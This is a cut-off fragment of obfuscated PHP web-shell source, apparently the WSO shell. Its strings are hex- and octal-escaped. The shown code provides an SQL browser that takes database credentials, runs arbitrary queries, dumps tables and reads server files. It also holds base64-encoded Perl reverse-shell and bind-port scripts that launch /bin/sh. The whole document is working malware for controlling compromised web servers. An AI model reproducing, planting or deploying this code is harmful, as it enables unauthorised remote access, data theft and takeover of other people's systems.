"\xa\x20\12\74\x68\x31\x3e\123\x71\x6c\x20\x62\162\x6f\x77\163\x65\x72\x3c\57\150\61\x3e\74\x64\151\x76\40\143\x6c\x61\163\163\x3d\x63\x6f\156\x74\x65\156\x74\x3e\xa\74\x66\157\162\155\40\x6e\141\155\x65\x3d\x27\x73\146\47\x20\155\145\164\x68\157\x64\75\x27\x70\157\x73\164\x27\x20\157\156\163\x75\142\x6d\151\164\75\47\x66\x73\50\x74\150\x69\163\51\x3b\47\76\74\164\141\142\x6c\145\x20\143\145\154\x6c\x70\x61\x64\x64\x69\x6e\x67\x3d\x27\62\47\x20\x63\x65\x6c\x6c\x73\160\141\143\x69\x6e\x67\x3d\x27\x30\47\x3e\x3c\x74\162\76\12\x3c\164\x64\76\124\171\160\x65\x3c\57\x74\x64\76\74\x74\x64\x3e\110\157\x73\x74\x3c\57\x74\144\76\x3c\x74\x64\76\x4c\157\x67\151\156\74\57\164\144\76\74\x74\144\x3e\120\x61\x73\x73\x77\157\162\144\x3c\57\164\144\x3e\x3c\164\x64\76\104\x61\x74\141\142\141\163\145\74\57\164\x64\x3e\x3c\x74\x64\x3e\x3c\x2f\x74\x64\76\x3c\x2f\164\x72\x3e\74\164\162\76\xa\x3c\x69\x6e\x70\165\164\x20\164\171\160\x65\x3d\150\x69\x64\144\145\x6e\40\156\x61\x6d\145\x3d\x61\40\x76\141\x6c\165\x65\x3d\x53\x71\x6c\76\x3c\x69\x6e\x70\165\x74\x20\164\x79\160\145\x3d\x68\151\x64\144\145\156\40\156\x61\155\x65\x3d\x70\x31\40\x76\141\x6c\x75\x65\x3d\47\x71\x75\x65\162\171\x27\x3e\x3c\x69\156\160\165\x74\x20\164\171\160\145\x3d\150\151\x64\x64\145\x6e\40\x6e\x61\155\145\x3d\x70\x32\x20\166\141\154\x75\145\75\x27\47\x3e\x3c\151\156\x70\x75\x74\x20\x74\171\x70\145\x3d\150\x69\x64\x64\x65\156\x20\x6e\x61\155\145\x3d\x63\x20\166\141\154\x75\145\x3d\x27" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\x27\x3e\x3c\151\x6e\160\165\x74\40\x74\x79\160\145\x3d\150\151\x64\144\145\x6e\x20\156\x61\155\x65\x3d\x63\x68\141\162\163\145\164\40\x76\x61\154\x75\x65\x3d\x27" . (isset($_POST["\x63\x68\x61\x72\x73\x65\x74"]) ? $_POST["\143\150\141\162\x73\x65\164"] : '') . "\47\76\12\x3c\x74\144\x3e\74\163\145\x6c\145\143\x74\40\x6e\x61\x6d\x65\x3d\x27\164\171\x70\145\x27\76\74\x6f\x70\164\x69\157\156\40\x76\141\x6c\x75\145\x3d\47\x6d\171\163\161\x6c\47\40"; if (@$_POST["\164\x79\x70\x65"] == "\155\171\x73\161\x6c") { echo "\163\145\154\x65\143\164\145\144"; } echo "\76\x4d\171\x53\161\x6c\x3c\x2f\157\160\x74\x69\x6f\156\x3e\74\157\160\x74\x69\x6f\156\x20\166\141\x6c\165\145\75\47\x70\147\163\x71\154\x27\40"; if (@$_POST["\x74\x79\160\145"] == "\x70\x67\x73\161\x6c") { echo "\x73\145\154\145\x63\x74\145\144"; } echo "\76\x50\157\163\x74\147\x72\145\x53\161\154\x3c\57\157\160\164\151\x6f\x6e\x3e\x3c\57\x73\x65\x6c\145\143\164\76\74\57\164\x64\76\xa\74\164\144\x3e\74\x69\156\160\165\x74\40\x74\171\x70\145\75\x74\145\170\164\40\x6e\141\155\145\x3d\163\161\x6c\137\x68\x6f\x73\x74\40\166\141\x6c\x75\x65\75\x27" . (empty($_POST["\163\x71\154\137\x68\x6f\163\x74"]) ? "\154\157\x63\141\x6c\150\157\x73\164" : htmlspecialchars($_POST["\x73\161\154\137\150\157\163\x74"])) . "\47\76\x3c\57\164\x64\76\12\x3c\164\x64\76\74\151\x6e\160\x75\164\x20\x74\171\x70\145\75\x74\x65\170\164\40\x6e\x61\155\x65\75\163\161\x6c\x5f\x6c\157\x67\x69\x6e\x20\x76\141\154\x75\145\75\47" . (empty($_POST["\x73\x71\154\137\x6c\x6f\147\x69\x6e"]) ? "\x72\157\x6f\164" : htmlspecialchars($_POST["\163\x71\154\137\x6c\x6f\x67\151\x6e"])) . "\47\76\x3c\57\164\x64\76\12\x3c\164\144\x3e\x3c\x69\156\x70\x75\164\x20\x74\171\x70\145\x3d\x74\145\x78\164\x20\x6e\x61\x6d\145\x3d\163\161\x6c\137\160\x61\163\163\x20\x76\141\154\x75\x65\75\x27" . (empty($_POST["\163\x71\x6c\137\160\141\x73\x73"]) ? '' : htmlspecialchars($_POST["\x73\x71\154\x5f\160\141\x73\x73"])) . "\x27\x3e\x3c\57\164\x64\x3e\x3c\164\x64\x3e"; $tmp = "\74\151\156\x70\165\164\x20\x74\171\x70\145\75\x74\x65\170\164\40\156\x61\155\x65\75\163\x71\154\137\x62\141\163\145\x20\166\141\x6c\x75\x65\75\x27\x27\76"; if (isset($_POST["\163\161\154\137\150\x6f\x73\x74"])) { if ($db->connect($_POST["\x73\161\154\137\150\157\x73\x74"], $_POST["\163\161\x6c\x5f\154\157\147\151\156"], $_POST["\163\161\154\137\x70\x61\163\x73"], $_POST["\x73\x71\x6c\x5f\142\141\x73\145"])) { switch ($_POST["\x63\x68\141\162\x73\145\164"]) { case "\127\151\x6e\x64\157\x77\x73\x2d\61\62\65\x31": $db->setCharset("\x63\160\x31\62\x35\x31"); break; case "\125\124\x46\x2d\x38": $db->setCharset("\x75\x74\x66\x38"); break; case "\x4b\x4f\x49\x38\55\122": $db->setCharset("\153\x6f\151\70\x72"); break; case "\x4b\117\111\70\x2d\x55": $db->setCharset("\153\157\x69\x38\x75"); break; case "\x63\x70\x38\66\66": $db->setCharset("\143\x70\70\x36\x36"); break; } $db->listDbs(); echo "\x3c\163\145\154\145\143\164\40\156\141\155\145\x3d\x73\161\x6c\137\142\141\163\145\x3e\x3c\x6f\160\164\x69\x6f\156\40\x76\x61\x6c\x75\x65\x3d\x27\x27\x3e\74\57\157\x70\164\151\x6f\156\76"; while ($item = $db->fetch()) { list($key, $value) = each($item); echo "\x3c\x6f\x70\x74\151\157\156\40\x76\141\154\x75\145\75\x22" . $value . "\42\x20" . ($value == $_POST["\163\161\154\x5f\142\x61\x73\145"] ? "\163\145\x6c\145\x63\164\x65\x64" : '') . "\76" . $value . "\74\57\x6f\x70\164\x69\x6f\x6e\x3e"; } echo "\74\x2f\x73\145\154\x65\143\164\x3e"; } else { echo $tmp; } } else { echo $tmp; } echo "\74\x2f\x74\x64\x3e\12\40\12\40\x20\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\74\164\144\x3e\x3c\x69\156\x70\x75\x74\x20\x74\171\160\x65\75\x73\x75\x62\x6d\151\164\40\166\x61\154\165\145\x3d\47\x3e\x3e\47\x20\x6f\156\x63\x6c\x69\x63\153\75\47\x66\163\x28\144\x2e\x73\146\51\x3b\x27\76\x3c\x2f\164\x64\x3e\12\40\40\40\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\x3c\x74\x64\76\74\151\156\160\x75\164\40\164\171\160\x65\75\143\x68\x65\x63\x6b\x62\x6f\170\x20\x6e\141\155\145\75\163\161\154\137\x63\x6f\165\x6e\x74\40\166\x61\x6c\165\145\x3d\47\157\x6e\x27" . (empty($_POST["\163\161\x6c\137\143\157\x75\x6e\164"]) ? '' : "\x20\143\150\145\x63\153\x65\144") . "\76\x20\x63\x6f\165\x6e\x74\x20\x74\150\x65\x20\156\165\x6d\142\145\x72\x20\x6f\146\x20\x72\x6f\167\163\x3c\57\164\144\x3e\12\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\74\57\164\162\76\12\40\x20\x20\40\40\40\40\x20\x3c\x2f\164\141\142\x6c\x65\x3e\12\40\40\x20\40\x20\40\x20\x20\x3c\163\x63\162\x69\160\x74\x3e\xa\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\163\x5f\x64\142\x3d\x27" . @addslashes($_POST["\x73\x71\x6c\137\x62\141\163\145"]) . "\47\x3b\12\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\x66\x75\x6e\143\164\x69\x6f\x6e\x20\x66\163\50\146\x29\40\173\12\40\40\x20\x20\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\151\x66\x28\x66\56\163\x71\154\137\142\x61\x73\x65\56\166\x61\x6c\165\x65\x21\x3d\x73\x5f\144\x62\51\x20\x7b\40\146\x2e\157\156\163\x75\x62\155\x69\x74\40\75\x20\146\x75\x6e\143\164\151\x6f\156\50\x29\40\x7b\175\x3b\xa\40\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\151\146\x28\146\x2e\x70\61\51\40\x66\56\160\x31\56\166\x61\x6c\x75\x65\75\x27\x27\x3b\xa\x20\40\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x69\x66\x28\146\56\160\62\51\x20\146\x2e\x70\62\56\x76\x61\154\x75\x65\x3d\x27\x27\x3b\12\x20\40\40\40\x20\40\40\40\40\x20\40\x20\40\40\40\40\40\40\40\x20\151\x66\x28\x66\x2e\x70\x33\x29\x20\146\x2e\160\63\56\x76\x61\x6c\165\145\x3d\x27\47\73\12\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x7d\12\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\175\12\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\146\x75\x6e\x63\x74\x69\157\156\x20\x73\164\x28\x74\x2c\154\x29\40\173\xa\x20\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\x20\40\40\144\56\163\146\x2e\160\61\x2e\166\x61\x6c\165\145\x20\75\x20\47\163\x65\154\x65\x63\164\47\73\12\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\144\x2e\x73\x66\x2e\x70\62\x2e\166\141\x6c\165\145\40\75\40\x74\73\12\x20\40\40\40\x20\40\40\x20\x20\40\40\40\40\40\40\x20\151\146\x28\x6c\40\46\46\40\144\56\x73\146\56\160\x33\x29\40\144\x2e\x73\x66\x2e\x70\x33\56\x76\141\x6c\165\x65\40\75\40\x6c\x3b\12\40\x20\40\40\40\40\x20\40\40\40\x20\40\40\40\40\40\x64\56\163\x66\x2e\x73\x75\142\155\x69\164\x28\x29\x3b\xa\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\x7d\xa\40\x20\x20\40\40\x20\40\x20\x20\40\40\40\x66\165\x6e\143\x74\151\157\x6e\x20\x69\x73\x28\51\x20\173\xa\x20\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x66\x6f\162\50\x69\75\x30\x3b\x69\74\144\56\163\x66\x2e\x65\x6c\x65\155\x65\x6e\164\x73\x5b\47\164\142\154\133\135\47\x5d\56\x6c\145\x6e\x67\x74\x68\73\x2b\x2b\151\51\12\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\40\144\x2e\x73\146\56\x65\154\x65\x6d\x65\156\x74\163\133\x27\x74\142\154\x5b\x5d\47\135\x5b\151\135\x2e\143\150\x65\143\x6b\145\144\x20\75\40\41\x64\x2e\163\x66\x2e\145\x6c\145\155\x65\156\x74\x73\133\x27\164\142\x6c\x5b\x5d\x27\x5d\x5b\151\135\56\143\150\145\143\153\x65\144\x3b\xa\40\40\x20\40\x20\40\x20\40\40\x20\x20\40\175\12\x20\x20\x20\x20\x20\40\x20\40\x3c\x2f\x73\143\x72\151\x70\x74\76"; if (isset($db) && $db->link) { echo "\74\x62\x72\x2f\x3e\74\164\x61\142\x6c\x65\40\167\x69\x64\x74\x68\x3d\x31\x30\60\45\x20\x63\145\154\154\160\x61\144\144\x69\x6e\x67\75\x32\40\143\x65\x6c\154\163\160\141\x63\x69\156\x67\75\60\76"; if (!empty($_POST["\163\x71\x6c\137\142\141\163\x65"])) { $db->selectdb($_POST["\163\x71\x6c\x5f\142\x61\163\x65"]); echo "\74\x74\162\76\x3c\x74\x64\x20\167\151\144\164\x68\x3d\x31\x20\x73\164\x79\154\x65\x3d\x27\142\x6f\162\144\x65\x72\x2d\x74\157\160\x3a\62\160\x78\40\163\157\x6c\151\x64\40\x23\66\66\66\73\x27\x3e\x3c\163\160\141\x6e\x3e\124\141\142\x6c\x65\x73\72\x3c\57\163\x70\141\156\76\x3c\x62\x72\x3e\x3c\x62\162\x3e"; $tbls_res = $db->listTables(); while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["\x73\161\154\137\143\x6f\165\x6e\x74"])) { $n = $db->fetch($db->query("\123\x45\114\x45\x43\124\x20\x43\x4f\x55\116\124\x28\52\x29\x20\x61\163\x20\x6e\x20\x46\x52\x4f\x4d\x20" . $value . '')); } $value = htmlspecialchars($value); echo "\x3c\x6e\x6f\x62\x72\76\x3c\151\156\160\165\x74\40\164\171\x70\145\x3d\x27\x63\x68\x65\x63\x6b\x62\157\x78\47\40\156\141\155\x65\75\47\x74\x62\154\133\135\x27\x20\166\x61\x6c\165\x65\x3d\x27" . $value . "\47\x3e\46\x6e\x62\x73\160\73\74\x61\40\x68\x72\x65\146\x3d\43\x20\x6f\156\x63\154\x69\x63\153\75\x22\x73\164\x28\47" . $value . "\47\x2c\61\51\42\76" . $value . "\x3c\x2f\141\76" . (empty($_POST["\x73\x71\x6c\x5f\x63\x6f\x75\x6e\x74"]) ? "\46\156\142\163\x70\x3b" : "\40\x3c\x73\x6d\141\x6c\x6c\76\50{$n["\x6e"]}\x29\x3c\x2f\163\155\x61\x6c\x6c\x3e") . "\74\x2f\156\x6f\142\162\x3e\x3c\142\x72\x3e"; } echo "\x3c\x69\x6e\x70\165\x74\x20\x74\171\160\x65\75\x27\143\x68\145\143\153\142\157\x78\47\x20\157\x6e\143\154\151\143\153\x3d\47\151\x73\x28\x29\73\47\x3e\40\x3c\151\x6e\x70\x75\164\x20\x74\x79\160\145\x3d\x62\165\164\164\157\156\x20\x76\141\x6c\x75\145\x3d\47\104\165\x6d\x70\47\x20\157\x6e\143\x6c\151\x63\x6b\75\x27\144\157\143\x75\x6d\145\156\164\56\163\146\56\x70\x32\56\166\x61\154\165\x65\75\42\x64\x6f\167\156\x6c\157\x61\x64\42\73\144\x6f\x63\165\155\x65\156\164\x2e\163\x66\x2e\x73\x75\142\155\x69\x74\50\51\73\x27\x3e\74\142\162\76\106\151\154\145\40\x70\141\x74\x68\72\x3c\x69\x6e\x70\x75\164\x20\164\171\x70\x65\75\x74\x65\170\x74\40\156\141\155\x65\x3d\146\151\154\145\40\x76\141\154\165\x65\x3d\47\x64\x75\155\160\56\163\161\x6c\x27\76\x3c\57\x74\x64\x3e\x3c\x74\x64\40\x73\164\x79\x6c\x65\75\x27\x62\x6f\x72\144\145\162\55\164\x6f\160\72\x32\160\170\x20\163\157\x6c\151\x64\x20\x23\x36\66\x36\73\47\76"; if (@$_POST["\160\x31"] == "\163\145\154\145\143\x74") { $_POST["\160\x31"] = "\x71\165\x65\x72\171"; $_POST["\x70\63"] = $_POST["\x70\x33"] ? $_POST["\160\x33"] : 1; $db->query("\x53\x45\x4c\105\103\x54\40\103\x4f\x55\116\x54\50\x2a\x29\x20\141\x73\x20\156\x20\106\x52\117\115\40" . $_POST["\x70\62"]); $num = $db->fetch(); $pages = ceil($num["\x6e"] / 30); echo "\x3c\163\143\162\x69\x70\164\76\x64\56\163\146\x2e\x6f\x6e\163\165\x62\155\151\x74\x3d\146\x75\x6e\x63\164\x69\x6f\156\50\x29\173\163\x74\x28\x22" . $_POST["\160\x32"] . "\x22\54\x20\144\56\163\146\x2e\160\x33\56\166\x61\x6c\165\145\51\x7d\74\x2f\163\x63\x72\x69\160\x74\x3e\x3c\163\160\141\156\76" . $_POST["\x70\62"] . "\74\57\163\x70\x61\156\x3e\40\50{$num["\x6e"]}\40\162\x65\x63\157\162\144\x73\51\x20\120\x61\x67\x65\x20\x23\40\x3c\151\x6e\x70\165\x74\40\x74\171\x70\145\75\x74\x65\x78\164\40\156\141\155\145\x3d\x27\x70\x33\47\x20\x76\x61\x6c\x75\x65\x3d" . (int) $_POST["\160\x33"] . "\x3e"; echo "\40\x6f\146\x20{$pages}"; if ($_POST["\160\x33"] > 1) { echo "\x20\x3c\141\x20\x68\x72\x65\146\x3d\x23\x20\157\156\143\154\x69\x63\153\75\47\163\164\50\x22" . $_POST["\160\62"] . "\42\x2c\x20" . ($_POST["\x70\63"] - 1) . "\51\47\76\x26\154\164\73\x20\x50\x72\x65\x76\74\57\x61\x3e"; } if ($_POST["\160\x33"] < $pages) { echo "\40\x3c\x61\x20\x68\162\145\146\x3d\x23\x20\x6f\156\x63\154\151\x63\x6b\x3d\x27\x73\164\50\42" . $_POST["\160\x32"] . "\x22\54\40" . ($_POST["\x70\63"] + 1) . "\x29\x27\76\116\145\170\164\x20\x26\x67\x74\73\x3c\x2f\141\x3e"; } $_POST["\x70\63"]--; if ($_POST["\x74\x79\160\145"] == "\160\147\163\161\x6c") { $_POST["\160\62"] = "\123\x45\114\x45\x43\x54\x20\52\x20\x46\x52\x4f\115\x20" . $_POST["\x70\x32"] . "\x20\x4c\x49\x4d\111\124\x20\x33\x30\40\117\106\106\x53\105\x54\x20" . $_POST["\160\x33"] * 30; } else { $_POST["\160\x32"] = "\123\105\x4c\105\103\x54\x20\x2a\40\x46\122\x4f\115\40\140" . $_POST["\x70\x32"] . "\x60\x20\x4c\x49\115\x49\124\x20" . $_POST["\160\x33"] * 30 . "\54\63\60"; } echo "\x3c\142\x72\76\74\x62\162\x3e"; } if (@$_POST["\x70\61"] == "\x71\165\145\162\171" && !empty($_POST["\x70\x32"])) { $db->query(@$_POST["\x70\62"]); if ($db->res !== false) { $title = false; echo "\74\x74\x61\x62\x6c\x65\40\167\151\x64\164\x68\75\x31\60\60\x25\x20\143\145\154\154\163\x70\x61\143\151\x6e\x67\x3d\x31\40\143\x65\154\x6c\160\x61\144\x64\151\x6e\x67\75\62\x20\x63\154\x61\163\x73\75\155\x61\151\156\x20\x73\164\171\x6c\x65\x3d\42\x62\x61\143\153\x67\x72\x6f\x75\156\x64\x2d\x63\x6f\154\157\162\x3a\x23\62\x39\62\71\62\x39\42\76"; $line = 1; while ($item = $db->fetch()) { if (!$title) { echo "\x3c\x74\162\x3e"; foreach ($item as $key => $value) { echo "\x3c\x74\x68\76" . $key . "\74\57\164\150\76"; } reset($item); $title = true; echo "\x3c\x2f\x74\162\x3e\x3c\x74\x72\76"; $line = 2; } echo "\x3c\x74\162\x20\143\154\x61\x73\x73\75\42\154" . $line . "\x22\x3e"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "\x3c\x74\144\x3e\x3c\x69\76\x6e\165\x6c\154\x3c\57\x69\76\74\x2f\164\144\76"; } else { echo "\74\x74\x64\x3e" . nl2br(htmlspecialchars($value)) . "\x3c\57\x74\144\x3e"; } } echo "\74\57\164\x72\76"; } echo "\74\x2f\x74\141\142\154\x65\x3e"; } else { echo "\x3c\144\x69\166\76\74\142\76\105\x72\x72\157\162\x3a\74\57\142\76\x20" . htmlspecialchars($db->error()) . "\x3c\x2f\x64\151\x76\76"; } } echo "\74\x62\162\x3e\x3c\57\146\x6f\x72\x6d\x3e\74\146\x6f\x72\155\x20\x6f\x6e\163\165\142\x6d\x69\x74\75\47\144\x2e\x73\146\x2e\160\61\x2e\x76\x61\x6c\x75\145\x3d\x22\161\165\x65\x72\x79\x22\x3b\144\x2e\163\146\56\x70\x32\x2e\x76\x61\x6c\165\145\75\x74\150\x69\x73\x2e\161\x75\145\x72\171\56\166\141\x6c\165\x65\73\x64\x6f\143\x75\155\x65\156\164\x2e\163\x66\56\x73\165\x62\x6d\151\164\x28\51\73\162\145\164\165\x72\x6e\40\146\141\x6c\x73\145\73\x27\76\74\x74\x65\x78\164\141\x72\x65\141\x20\156\141\x6d\x65\75\47\161\x75\145\162\x79\47\40\163\x74\171\154\x65\x3d\47\x77\x69\x64\x74\150\72\61\x30\60\x25\73\x68\145\x69\x67\150\164\x3a\x31\60\x30\x70\x78\x27\76"; if (!empty($_POST["\x70\x32"]) && $_POST["\160\x31"] != "\x6c\157\x61\x64\x66\x69\154\145") { echo htmlspecialchars($_POST["\x70\x32"]); } echo "\x3c\57\x74\x65\170\164\x61\162\x65\x61\x3e\x3c\x62\x72\x2f\x3e\74\151\156\x70\x75\x74\x20\164\x79\160\x65\x3d\163\x75\x62\x6d\x69\164\x20\166\x61\x6c\165\145\x3d\x27\x45\170\x65\143\165\164\145\x27\76"; echo "\x3c\57\164\x64\76\x3c\x2f\164\x72\76"; } echo "\74\x2f\x74\141\142\x6c\x65\76\x3c\57\146\157\162\155\x3e\x3c\x62\x72\57\x3e"; if ($_POST["\164\x79\160\145"] == "\155\171\163\161\x6c") { $db->query("\123\x45\x4c\105\x43\124\x20\x31\x20\x46\x52\x4f\x4d\40\155\171\163\x71\154\x2e\165\163\x65\162\40\x57\110\x45\x52\x45\x20\143\x6f\x6e\x63\x61\164\x28\140\165\x73\x65\x72\x60\x2c\40\x27\100\47\54\40\140\x68\157\x73\164\140\51\40\75\x20\x55\x53\105\x52\50\51\x20\x41\116\104\x20\140\106\x69\154\x65\x5f\x70\x72\151\166\140\40\x3d\x20\47\x79\x27"); if ($db->fetch()) { echo "\74\x66\157\162\155\x20\x6f\x6e\163\165\142\155\x69\164\75\47\x64\56\x73\146\56\x70\x31\x2e\166\141\x6c\165\145\75\x22\x6c\x6f\141\x64\x66\151\154\x65\x22\73\144\157\x63\x75\x6d\145\x6e\164\56\163\x66\x2e\x70\x32\56\x76\x61\x6c\165\145\x3d\164\150\x69\x73\56\x66\x2e\166\141\154\x75\x65\x3b\x64\x6f\143\165\155\x65\x6e\x74\56\163\x66\56\x73\165\x62\x6d\x69\164\x28\x29\x3b\x72\145\164\165\x72\x6e\40\146\141\x6c\163\145\73\x27\x3e\74\163\x70\x61\156\x3e\114\157\141\144\40\x66\x69\x6c\x65\x3c\x2f\x73\160\x61\156\76\40\x3c\151\156\160\165\x74\40\x20\143\x6c\141\163\163\x3d\x27\164\157\157\x6c\x73\111\x6e\x70\x27\x20\x74\171\x70\x65\x3d\164\145\170\x74\40\x6e\141\x6d\x65\x3d\x66\76\x3c\x69\x6e\x70\x75\x74\x20\164\171\x70\x65\x3d\x73\165\x62\x6d\151\164\40\166\141\x6c\165\x65\x3d\x27\x3e\x3e\x27\x3e\74\x2f\146\x6f\x72\155\x3e"; } } if (@$_POST["\160\x31"] == "\154\x6f\141\x64\x66\x69\154\145") { $file = $db->loadFile($_POST["\x70\62"]); echo "\x3c\x70\x72\x65\40\x63\x6c\141\163\x73\x3d\155\154\61\76" . htmlspecialchars($file["\146\x69\x6c\145"]) . "\x3c\x2f\x70\x72\145\76"; } } else { echo htmlspecialchars($db->error()); } echo "\74\x2f\144\x69\166\76"; wsoFooter(); } goto o85Ey; o85Ey: function actionNetwork() { wsoHeader(); $back_connect_p = "\x49\171\105\x76\144\130\116\x79\114\x32\x4a\x70\x62\151\x39\167\132\130\x4a\163\104\121\160\61\x63\62\125\147\x55\x32\x39\x6a\141\62\126\60\x4f\167\60\113\112\107\x6c\x68\132\x47\122\x79\x50\127\154\x75\x5a\x58\122\x66\131\130\x52\x76\x62\151\x67\153\121\126\112\110\126\154\163\167\x58\123\x6b\x67\146\110\167\x67\132\107\154\x6c\113\103\x4a\106\x63\156\112\x76\x63\152\157\147\112\x43\x46\143\x62\151\111\160\x4f\167\60\x4b\x4a\x48\x42\x68\x5a\x47\122\171\x50\x58\x4e\166\131\x32\x74\x68\x5a\x47\122\x79\130\62\154\165\113\x43\122\x42\x55\153\x64\127\x57\172\x46\144\114\103\x41\x6b\141\x57\x46\x6b\x5a\110\111\160\x49\110\x78\70\x49\x47\x52\160\x5a\123\147\x69\x52\x58\112\171\x62\x33\x49\x36\111\103\x51\x68\x58\x47\64\x69\113\x54\163\116\x43\151\x52\167\x63\155\x39\x30\142\172\x31\x6e\132\x58\x52\x77\x63\x6d\x39\x30\x62\62\x4a\x35\142\x6d\x46\x74\132\x53\x67\x6e\144\x47\x4e\x77\x4a\x79\x6b\67\x44\x51\x70\172\x62\x32\116\x72\132\x58\121\157\x55\60\71\104\123\x30\126\125\x4c\x43\x42\x51\x52\154\x39\x4a\x54\153\x56\x55\114\103\102\124\124\x30\116\114\x58\x31\116\x55\x55\153\126\x42\124\x53\x77\147\x4a\110\x42\171\142\x33\122\166\113\123\102\70\x66\103\102\153\141\x57\x55\x6f\111\153\126\x79\x63\x6d\71\x79\x4f\x69\x41\153\111\x56\x78\165\x49\x69\153\x37\x44\x51\x70\x6a\x62\62\x35\x75\x5a\x57\x4e\x30\113\x46\116\120\x51\x30\x74\x46\x56\103\x77\147\x4a\x48\102\150\132\107\122\171\x4b\123\102\x38\146\x43\x42\x6b\x61\x57\x55\157\x49\153\x56\171\143\155\71\171\117\x69\101\153\111\126\x78\x75\x49\x69\153\x37\x44\121\x70\166\143\107\x56\x75\113\x46\116\x55\x52\x45\x6c\117\x4c\103\x41\x69\120\151\x5a\124\x54\x30\116\x4c\122\x56\121\x69\113\124\163\x4e\x43\x6d\71\167\132\127\x34\x6f\125\61\122\105\124\61\x56\125\114\103\x41\x69\x50\x69\x5a\124\x54\x30\116\x4c\x52\126\121\x69\113\124\163\116\103\x6d\x39\167\x5a\127\x34\157\x55\x31\122\105\122\126\112\123\x4c\x43\101\151\120\x69\132\124\124\x30\116\x4c\122\126\x51\x69\x4b\124\163\x4e\103\x6e\x4e\65\143\x33\122\x6c\142\x53\x67\156\114\x32\x4a\160\142\x69\x39\172\x61\x43\101\x74\x61\x53\x63\160\x4f\x77\x30\113\x59\x32\170\x76\143\x32\x55\x6f\x55\x31\x52\x45\x53\x55\x34\160\x4f\167\x30\x4b\x59\x32\170\166\143\x32\125\157\x55\x31\122\x45\x54\61\x56\x55\113\124\163\x4e\x43\x6d\116\x73\x62\63\116\154\113\x46\116\125\x52\105\x56\123\125\151\153\x37"; $bind_port_p = "\111\171\105\166\x64\x58\x4e\x79\114\62\112\x70\142\151\71\167\132\130\112\163\104\121\x6f\x6b\125\60\x68\x46\124\105\x77\71\x49\x69\71\x69\141\127\x34\x76\x63\62\147\x67\114\x57\153\151\117\167\60\x4b\x61\127\x59\x67\x4b\x45\x42\x42\125\x6b\x64\127\x49\104\x77\x67\115\x53\x6b\x67\145\171\x42\154\x65\x47\154\x30\x4b\104\x45\x70\x4f\171\x42\71\104\x51\160\61\x63\x32\125\x67\125\x32\71\x6a\141\x32\x56\x30\117\x77\60\113\143\62\71\x6a\x61\62\126\60\x4b\x46\x4d\x73\112\x6c\102\x47\x58\x30\154\117\x52\126\121\163\112\x6c\x4e\x50\x51\60\x74\x66\x55\x31\122\x53\122\x55\x46\116\x4c\x47\x64\x6c\144\x48\x42\x79\x62\x33\122\x76\x59\156\154\x75\131\127\61\x6c\x4b\x43\144\x30\x59\x33\x41\x6e\x4b\x53\x6b\x67\x66\x48\167\147\x5a\107\154\x6c\x49\103\112\104\x59\127\x35\60\111\107\x4e\171\132\x57\106\x30\x5a\123\102\172\142\62\x4e\162\132\x58\x52\143\142\151\111\67\104\x51\160\x7a\x5a\130\122\x7a\x62\x32\x4e\x72\x62\x33\x42\x30\x4b\x46\115\163\x55\x30\71\115\x58\x31\x4e\x50\x51\60\164\x46\126\103\170\x54\x54\61\x39\x53\122\x56\x56\124\122\x55\106\105\x52\x46\111\x73\115\x53\x6b\x37\104\121\x70\x69\141\x57\65\153\x4b\106\x4d\x73\x63\x32\x39\152\x61\x32\x46\153\132\x48\x4a\x66\x61\127\64\x6f\112\105\106\x53\122\61\132\x62\x4d\106\x30\163\123\125\x35\102\x52\x45\x52\123\x58\x30\106\117\x57\x53\153\160\x49\x48\170\x38\x49\107\122\x70\x5a\x53\x41\x69\x51\x32\x46\165\x64\103\x42\166\143\107\126\x75\x49\x48\102\166\x63\x6e\x52\x63\142\151\x49\x37\104\x51\160\163\x61\130\x4e\x30\x5a\127\x34\x6f\x55\171\167\x7a\113\x53\102\x38\146\103\x42\x6b\141\x57\x55\147\x49\x6b\x4e\x68\142\156\121\147\x62\x47\x6c\172\144\107\x56\x75\111\110\102\166\143\x6e\122\143\x62\x69\111\67\104\121\x70\x33\141\x47\154\163\x5a\x53\x67\x78\113\x53\102\x37\x44\x51\x6f\112\131\127\x4e\152\x5a\130\x42\x30\x4b\x45\116\x50\x54\153\x34\163\125\x79\x6b\67\104\121\x6f\x4a\141\x57\x59\x6f\111\x53\x67\153\x63\107\154\153\x50\x57\132\166\143\155\x73\x70\x4b\x53\102\x37\x44\121\157\x4a\x43\127\122\x70\132\x53\x41\151\x51\62\106\165\x62\155\71\x30\x49\x47\x5a\166\143\x6d\163\151\x49\x47\x6c\x6d\111\x43\x67\150\132\x47\x56\155\141\x57\x35\x6c\x5a\103\x41\153\143\x47\x6c\153\113\124\x73\116\103\x67\153\x4a\x62\x33\102\x6c\x62\151\x42\124\126\105\122\112\124\x69\x77\151\120\103\132\104\124\x30\65\x4f\111\x6a\163\116\x43\147\153\x4a\x62\x33\x42\154\x62\151\102\124\x56\105\x52\120\126\126\121\x73\x49\152\x34\155\x51\60\x39\x4f\x54\151\111\67\104\121\x6f\112\x43\127\71\167\132\127\x34\x67\125\x31\122\x45\122\126\112\x53\x4c\x43\111\x2b\112\x6b\x4e\x50\x54\x6b\64\151\117\x77\x30\113\103\121\x6c\154\145\x47\x56\x6a\111\x43\122\124\123\105\x56\115\x54\x43\102\70\146\103\102\153\x61\127\125\x67\143\x48\x4a\x70\x62\x6e\121\147\121\60\71\x4f\124\151\x41\151\x51\x32\106\165\144\103\10